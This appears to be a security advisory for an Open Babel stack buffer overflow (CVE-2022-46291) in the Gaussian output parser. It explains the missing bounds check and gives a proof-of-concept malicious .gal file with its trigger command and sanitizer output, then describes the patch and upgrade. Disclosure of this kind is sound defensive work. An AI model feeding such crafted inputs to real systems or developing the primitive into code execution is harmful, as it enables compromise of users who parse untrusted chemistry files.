CVE-2022-46291: Open Babel Gaussian Parser Stack Buffer Overflow via translationVectors
A crafted Gaussian output file can write past the end of a 3-element stack array in Open Babel's chemistry file parser, potentially giving an attacker arbitrary code execution.
The problem
Open Babel's Gaussian output reader in `gaussformat.cpp` declares a fixed-size stack array `vector3 translationVectors[3]` and an integer counter `numTranslationVectors = 0`.
When the parser encounters a `PeriodicType` line, it enters a `while` loop that reads subsequent lines and writes each one into the array, incrementing the counter with no upper-bound check. An attacker who supplies more than three translation-vector lines pushes writes beyond the array, corrupting adjacent stack memory.
The write lands in `vector3::Set()` with fully attacker-controlled x, y, z double values, making this a high-quality stack corruption primitive. CVSS 7.8 (local, no privileges required).
Proof of concept
A working proof-of-concept for CVE-2022-46291 in openbabel, with the exact payload below.
# Minimal malicious Gaussian output file (.gal)
# Triggers the OOB write: 4+ PeriodicType vector lines
# exceed the translationVectors[3] stack array bound.
Entering Link 1 = /fake/l1.exe
#p hf/sto-3g
Fake molecule
Standard orientation:
---------------------------------------------------------------------
Center Atomic Atomic Coordinates (Angstroms)
Number Number Type X Y Z
---------------------------------------------------------------------
1 6 0 0.000000 0.000000 0.000000
---------------------------------------------------------------------
PeriodicType 100
1 2 3 1.000000 2.000000 3.000000
1 2 3 4.000000 5.000000 6.000000
1 2 3 7.000000 8.000000 9.000000
1 2 3 1.100000 2.200000 3.300000
1 2 3 4.400000 5.500000 6.600000
1 2 3 7.700000 8.800000 9.900000
# Trigger:
# $ obabel -i gal malicious.gal -o sdf
# => ASAN: stack-buffer-overflow WRITE of size 8
# in GaussianOutputFormat::ReadMolecule (gaussformat.cpp:635)The root cause (CWE-787) is the missing bounds check on `numTranslationVectors` before indexing into `translationVectors[numTranslationVectors++]`. The loop exits only when EOF is reached or a line has fewer than 6 tokens, so an attacker can keep supplying 6-token lines indefinitely.
Each overflowing write calls `vector3::Set(x, y, z)` with values parsed directly from attacker-supplied tokens via `atof()`, giving full control over the written doubles. Depending on the stack layout and compiler, this can overwrite saved frame pointers or return addresses.
The patch (commit 40e85213) adds a guard `if (numTranslationVectors < 3)` (or equivalent) before the write, breaking the unbounded loop as soon as the array is full.
The fix
Upgrade to Open Babel 3.2.0 (released 2026-05-26), which includes commit 40e85213 adding the missing array-bounds check before every `translationVectors[numTranslationVectors++]` write in the Gaussian, MSI, MOPAC, and MOPAC-IN readers. No workaround exists for older versions other than refusing to parse untrusted `.gal` / `.g09` / `.g16` files.
Reported by Cisco Talos Intelligence Group.
Related research
- high · 7.8CVE-2022-43467CVE-2022-43467: Open Babel PQS Parser Out-of-Bounds Write
- high · 7.8CVE-2022-43607CVE-2022-43607: Open Babel MOL2 Parser Stack Buffer Overflow
- high · 7.8CVE-2022-46293CVE-2022-46293: Open Babel MOPAC Output Parser Stack Buffer Overflow
- high · 7.8CVE-2022-46294CVE-2022-46294: Open Babel MOPAC Cartesian Out-of-Bounds Write